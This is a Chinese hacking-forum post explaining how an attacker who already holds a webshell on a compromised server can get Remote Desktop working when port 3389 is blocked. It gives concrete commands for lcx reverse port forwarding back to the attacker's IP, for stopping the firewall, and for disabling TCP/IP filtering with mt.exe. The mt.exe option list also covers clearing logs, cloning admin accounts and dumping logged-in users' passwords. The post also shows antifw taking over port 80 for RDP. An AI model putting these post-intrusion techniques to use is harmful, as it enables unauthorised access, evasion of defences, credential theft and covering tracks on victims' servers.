开了3389后WEB渗透远程连接不上的分析与解决
对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下, <br /><strong><font color="#ff0000">原因1</font></strong>、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。 <br />好了,知道原因了,我们来一个一个思考解决方法(部分引用): <br />远程桌面端口被更改解决方法: <br />现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(Terminal Service)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。 <br />对方服务器处于内网解决方法: <br />这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“lcx.exe下载”,我就不提供下载了。 <br /><strong>使用方法:</strong> <br />1.上传lcx.exe到目标服务器可执行目录 <br />2.本地主机启动lcx.exe监听,命令: <br />lcx.exe -listen 1988 4567 // 监听1988端口并转发到4567端口 <br /><strong>在目标主机运行: <br /></strong>格式为: <br />lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口 <br />例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389 <br />3.本地链接:127.0.0.1:1988 <br />OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。 <br /><strong>4、防火墙拦截解决办法:</strong> <br />一般还是先试试端口转发,还是利用LCX, <br />使用方法: <br />lcx.exe -slave 你的IP 你监听的端口 肉机 要转发的目标主机端口 <br />例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389 <br />然后本地连接:127.0.0.1:1988 就搞定了。 <br />如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。 <br />5、TCP/IP安全策略限制。 <br />这个解决方法就有点多了,可以使用MT.EXE来关闭策略, <br />使用方法: <br />1.上传mt.exe到目标服务器可执行目录 <br />2.执行命令:mt.exe -filter off <br />这样就关闭了TCP/IP限制了 <br />选项: <br />-filter —更改TCP/IP 过滤器的开头状态 <br />-addport —添加端口到过滤器的允许列表 <br />-setport —设置端口作为过滤器的允许列表 <br />-nicinfo —列出TCP/IP 界面信息 <br />-pslist —列出活动进程 <br />-pskill —杀毒指定进程 <br />-dlllist —列出指定进程的DLL <br />-sysinfo —列出系统信息 <br />-shutdown —关闭系统 <br />-reboot —重启系统 <br />-poweroff —关闭电源 <br />-logoff —注销当前用户会话 <br />-chkts —检查终端服务信息 <br />-setupts —安装终端服务 <br />-remts —卸载终端服务 <br />-chgtsp —重置终端服务端口 <br />-clog —清除系统日志 <br />-enumsrv —列出所有服务 <br />-querysrv —列出指定服务的详细信息 <br />-instsrv —安装一个服务 <br />-cfgsrv —更改服务配置 <br />-remsrv —卸载指定服务 <br />-startsrv —启动指定服务 <br />-stopsrv —停止指定服务 <br />-netget —从http/ftp 下载 <br />-redirect —端口重定向 <br />-chkuser —列出所有账户、sid 和anti 克隆 <br />-clone —克隆admin 到目标 <br />-never —设置账户看上去从未登录 <br />-killuser —删除账户,甚至是 “guest” 也可删除 <br />-su —以Local_System 权限运行进程 <br />-findpass —显示所有已登录用户的口令 <br />-netstat —列出TCP 连接 <br />-killtcp —杀死TCP 连接 <br />-psport —映射端口到进程 <br />-touch —设置文件日期和时间到指定值 <br />-secdel —安全擦除文件或目录占用的空间 <br />-regshell —进入一个控制台注册表编辑器 <br />-chkdll —检测gina dll 后门 <br />上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。 <br />使用antifw.exe这个工具, <br /><strong>使用方法</strong>: <br />在cmd下输入 <br />antifw -s 运行程序 停止iis将3389改为80 <br />antifw -l 关闭程序。恢复iis <br />连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。 <br />没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。 <br />By:Seay <br />
頁:
[1]